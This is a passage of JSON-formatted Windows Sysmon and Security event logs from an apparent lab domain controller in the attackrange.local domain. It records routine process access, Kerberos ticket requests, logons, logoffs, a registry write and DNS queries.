1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.454","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220378,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x47F7D\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x47f7d","LogonType":"3","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220379,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x47CB1\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x47cb1","LogonType":"3","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220380,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x48E3C\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x48e3c","LogonType":"3","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2633,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.766\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.766","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2634,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:50.485\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:50.485","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2635,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:50.485\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:50.485","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220381,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tSupplied Realm Name:\tattackrange.local\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"attackrange.local","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220382,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-6178966$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{75D5BBB3-E613-FFA9-7920-011612A5E074}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40800000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-6178966$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40800000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{75D5BBB3-E613-FFA9-7920-011612A5E074}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220383,"ProcessID":864,"ThreadID":1560,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4A1D9\r\n\r\nPrivileges:\t\tSeAuditPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeAssignPrimaryTokenPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4a1d9","PrivilegeList":"SeAuditPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeAssignPrimaryTokenPrivilege","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220384,"ProcessID":864,"ThreadID":1560,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4A1D9\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{57B170F2-ED3D-5729-1C49-697DBFC841AC}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t10.0.1.14\r\n\tSource Port:\t\t49707\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4a1d9","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{57B170F2-ED3D-5729-1C49-697DBFC841AC}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"10.0.1.14","IpPort":"49707","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220385,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4A1D9\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4a1d9","LogonType":"3","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":2636,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: \r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:53:50.657\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nProcessId: 1216\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{ACC0D8E8-21D9-420F-BFB3-71A9BDDE4A9B}\\DateLastConnected\r\nDetails: Binary Data","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","UtcTime":"2020-08-01 07:53:50.657","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010BCC20000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{ACC0D8E8-21D9-420F-BFB3-71A9BDDE4A9B}\\DateLastConnected","Details":"Binary Data","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2637,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:50.442\r\nProcessGuid: {41C8662E-1F63-5F25-0000-001044B90000}\r\nProcessId: 1140\r\nQueryName: win10.ipv6.microsoft.com.\r\nQueryStatus: 0\r\nQueryResults: type:  5 onpremwindows.ipv6.microsoft.com.akadns.net;type:  5 trdovmsswestus.ipv6.microsoft.com.akadns.net;52.241.128.114;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:50.442","ProcessGuid":"{41C8662E-1F63-5F25-0000-001044B90000}","QueryName":"win10.ipv6.microsoft.com.","QueryStatus":"0","QueryResults":"type:  5 onpremwindows.ipv6.microsoft.com.akadns.net;type:  5 trdovmsswestus.ipv6.microsoft.com.akadns.net;52.241.128.114;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
